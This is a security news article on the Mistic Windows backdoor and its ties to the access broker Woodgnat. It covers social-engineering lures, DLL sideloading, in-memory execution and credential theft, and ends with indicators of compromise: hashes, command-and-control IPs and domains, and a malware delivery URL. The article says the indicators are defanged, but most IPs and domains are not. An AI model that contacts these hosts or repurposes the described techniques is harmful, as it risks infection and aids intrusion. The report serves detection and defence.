New Windows Backdoor Mistic Enables In-Memory Code Execution and Credential Theft

In Cybersecurity News - Original News Source is cybersecuritynews.com by Blog Writer

Spread the love

A newly identified Windows backdoor called Mistic has been quietly making its way through enterprise networks since April 2026, giving attackers persistent, low-profile access that is extremely difficult to detect.

The malware has been spotted targeting organizations across the insurance, education, information technology, and professional services sectors, with attackers showing opportunistic behavior rather than focusing on a single industry.

Mistic stands out from many other backdoors because of how effectively it hides its tracks. It executes payloads entirely within memory, meaning no malicious file is ever written to the hard drive.

This approach bypasses a large number of traditional detection tools that rely on scanning files stored on disk.

Analysts at PolySwarm flagged this threat and noted it may represent an evolution in the tooling used by access brokers, specifically those who break into corporate networks and then sell that foothold to ransomware groups.

The malware has been observed operating alongside ModeloRAT, a Python-based remote access trojan previously linked to the financially motivated group tracked as Woodgnat, also known publicly as KongTuke.

According to PolySwarm and Symantec’s Threat Hunter Team report shared with Cyber Security News (CSN), Mistic was deployed in intrusions where attackers used social engineering lures, including fake browser crashes and fake CAPTCHA tests, to trick victims into executing attacker-supplied PowerShell commands.

These techniques are consistent with Woodgnat’s known delivery methods.

Security researchers have noted that Woodgnat appears capable of developing increasingly advanced tools as it expands its network of ransomware partners.

New Windows Backdoor Mistic

The Mistic backdoor reaches its target through a method called DLL sideloading, where a legitimate Microsoft executable named MpExtMs.exe is manipulated into loading a malicious file instead of the expected one.

The malicious DLL is named EndpointDlp.dll, borrowing the name from a genuine Microsoft endpoint security component, helping it blend seamlessly into trusted software environments.

Once active, Mistic connects to an attacker-controlled command-and-control server and waits for instructions.

It can upload and download files, create and delete folders, move or rename data, and most importantly, execute operator-supplied code directly in memory without touching the disk.

A separate credential-stealing component, delivered as a .NET DLL, was also observed alongside Mistic, presenting victims with a fake login screen to harvest their usernames and passwords.

The malware also carries a kill switch that allows the operator to fully remove it from a compromised system on command, significantly reducing forensic evidence and complicating post-incident investigations.

Additional tools seen in the same attack chains included PowerShell, certutil, WMIC, and curl.exe, all legitimate Windows utilities repurposed for malicious activity.

Woodgnat’s Access Broker Operations

Mistic is believed to be connected to Woodgnat, a financially motivated cybercrime group active since at least May 2024.

The group primarily operates as an initial access broker, meaning its goal is not to deploy ransomware itself, but to establish long-term access within enterprise environments and sell that access to ransomware affiliates.

Woodgnat has been publicly linked to groups including Qilin, Akira, Rhysida, Black Basta, Interlock, and 8Base.

The group typically gains a foothold by compromising WordPress websites through vulnerable plugins or stolen credentials, then injecting JavaScript that serves social engineering lures to visitors.

Over time, Woodgnat has refined these lures, shifting from ClickFix fake error pages to FileFix and then CrashFix techniques, all designed to push victims into pasting and running attacker-supplied commands.

Since April 2026, the group has also been observed using fake Microsoft Teams helpdesk chats to walk employees through these sequences.

Security researchers recommend that organizations monitor closely for unusual DLL sideloading activity, especially when legitimate Microsoft executables load unexpected files.

Defenders should also watch for abnormal use of built-in tools like curl.exe, certutil, and PowerShell, and prioritize behavioral detection and memory-focused analysis over traditional signature-based controls to counter threats like Mistic effectively.

Indicators of Compromise (IoCs):-

Type Indicator Description
SHA-256 1e41c7bfaa6aa3b93b6cc024274a10e33f3e12fe7c98c1db387ef8927f9d1984 Backdoor.Mistic — endpointdlp.dll
SHA-256 34d798a6c55e57ed0932b6499f4fbcb5454bdfca903307be101a0594b0ac07bc Fake lock screen — f.dll
SHA-256 3f797a639bc855bc6d5471f327924b62d10900ddec49b970eca6604142bbb4be Backdoor.Mistic — aeff97fe.msi
SHA-256 59e3c4cb06331b4f2d78a9a0592f3747e573bd01c5a7650c26361d1e25520712 Loader for backdoor — version.dll
SHA-256 8c935feec4bd05d5d918df308be417532fb42608fb989a08eab183e0ae699235 Likely privilege escalation — n.dll
SHA-256 afd5f1ed45a9867daf3bc64152cef460a06b164c8183e490db39146d4749a82c Backdoor.Mistic — endpointdlp.dll
SHA-256 db972979d508e75fe730d3b72c2701470fbdaeaf8ebdd674744754fa44438ca5 Backdoor.Mistic — endpointdlp.dll
SHA-256 f591275a8f014b29e567529d67c54eb7bb4473db1c38737d6bfd5b3d52c9344e Backdoor.Mistic — 48b47c0.msi
SHA-256 fb3630822b70bacb56aa4cec29b5a0e3e9acb3920809e70310a4003385a6d34a Backdoor.Mistic — endpointdlp.dll
IP Address 142.93.242.144 C2 network indicator
IP Address 144.31.53.78 C2 network indicator
IP Address 198.13.159.44 C2 network indicator
IP Address 199.91.221.42 C2 network indicator
Domain authorized-logins.net C2 domain
Domain b6w9m2z5x8q1v3k.top C2 domain
Domain carrolc.com C2 domain
Domain cj06y9v4xab.com C2 domain
Domain cwrtwright.com C2 domain
Domain defs.updater-worelos.com C2 domain
Domain ftps.upd-domain-goloro.com C2 domain
Domain grande-luna.top C2 domain
Domain human-check.top C2 domain
Domain mail.authorized-logins.net C2 domain
Domain mailes.upd-domain-goloro.com C2 domain
Domain mails.updater-worelos.com C2 domain
Domain mueleer.com C2 domain
Domain nano.upscale-kolo.com C2 domain
Domain oeannon.com C2 domain
Domain php.authorized-logins.net C2 domain
Domain rotoa-upda-lo.com C2 domain
Domain sql-updater-service.com C2 domain
Domain sss.authorized-logins.net C2 domain
Domain thomphon.com C2 domain
Domain upd-domain-goloro.com C2 domain
Domain update.update-fall.com C2 domain
Domain updater-worelos.com C2 domain
Domain upscale-kolo.com C2 domain
Domain w3xasv14culvnqj.top C2 domain
URL hxxp://thomphon[.]com/update.msi Malware delivery URL

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

 Strengthen Your SOC by Accelerating Threat Detection & Rapid Investigations. -> Integrate ANY.RUN With Your SOC Now.